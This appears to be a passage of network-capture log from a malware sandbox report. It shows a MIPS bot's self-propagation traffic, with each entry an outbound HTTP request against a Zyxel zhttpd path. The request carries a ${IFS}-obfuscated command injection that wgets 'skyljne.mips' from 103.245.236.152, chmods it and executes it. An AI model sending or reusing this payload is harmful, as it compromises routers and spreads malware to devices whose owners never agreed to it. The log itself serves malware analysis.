                                            Jan 14, 2024 15:50:55.740343094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8652192.168.2.2333496197.105.167.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740396023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8653192.168.2.233392299.210.45.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740428925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8654192.168.2.2338512142.129.67.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740479946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8655192.168.2.2353500165.165.11.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740533113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8656192.168.2.235175832.12.121.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740571976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8657192.168.2.2352608106.166.198.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740622044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8658192.168.2.2344370200.26.150.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740672112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8659192.168.2.234195070.131.219.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740721941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8660192.168.2.235902446.247.63.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740762949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8661192.168.2.235459075.185.91.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740827084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8662192.168.2.234842817.23.112.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740852118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8663192.168.2.234850663.70.84.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740886927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8664192.168.2.234729282.44.234.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740938902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8665192.168.2.2347470191.79.211.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740997076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8666192.168.2.2350058122.105.29.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741024971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8667192.168.2.2360792168.107.181.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741056919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8668192.168.2.2337624121.48.61.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741125107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8669192.168.2.2344714126.71.58.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741143942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8670192.168.2.2349380188.71.123.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741177082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8671192.168.2.236094245.40.59.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741250038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8672192.168.2.2358744221.201.214.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741295099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8673192.168.2.235505250.42.210.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741343021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8674192.168.2.235077413.97.223.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741400957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8675192.168.2.233395880.129.109.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741455078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8676192.168.2.235529290.44.241.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741483927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8677192.168.2.235307267.70.234.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741512060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8678192.168.2.2339504133.80.237.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741552114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8679192.168.2.2359918178.52.73.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741610050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8680192.168.2.234753447.188.208.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741664886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8681192.168.2.2343342203.190.102.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741697073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8682192.168.2.2341964132.58.44.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741740942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8683192.168.2.2350356141.221.107.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741782904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8684192.168.2.2333434179.102.129.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741836071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8685192.168.2.2335162148.163.217.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741859913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8686192.168.2.2339948162.72.177.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741902113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8687192.168.2.2358462130.17.40.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741944075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8688192.168.2.2336866193.47.13.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.741974115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8689192.168.2.235453646.232.100.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742028952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8690192.168.2.235388846.32.185.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742078066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8691192.168.2.2351980163.154.149.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742121935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8692192.168.2.234437244.127.34.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742156029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8693192.168.2.2351928217.21.215.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742207050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8694192.168.2.2334370130.103.124.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742350101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8695192.168.2.2340480109.19.242.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742382050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8696192.168.2.235913013.57.166.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742413044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8697192.168.2.234341493.168.8.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742444038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8698192.168.2.235706898.188.100.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742477894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8699192.168.2.2344582182.96.231.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742506981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8700192.168.2.235528498.231.68.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742542028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8701192.168.2.234394653.214.112.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742582083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8702192.168.2.235774076.125.42.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742635965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8703192.168.2.234735458.109.132.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742697954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8704192.168.2.234068241.201.206.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742717981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8705192.168.2.2345132193.1.111.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742769003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8706192.168.2.235407097.61.59.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742834091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8707192.168.2.235629292.9.30.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742860079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8708192.168.2.23576321.67.63.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742892981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8709192.168.2.2334220196.191.189.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742901087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8710192.168.2.2359104161.26.203.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742964983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8711192.168.2.235730834.147.169.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.742995977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8712192.168.2.2347346141.188.105.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743041992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8713192.168.2.234277494.82.68.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.743087053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8714192.168.2.2344444113.190.142.184443
                                            TimestampBytes transferredDirectionData
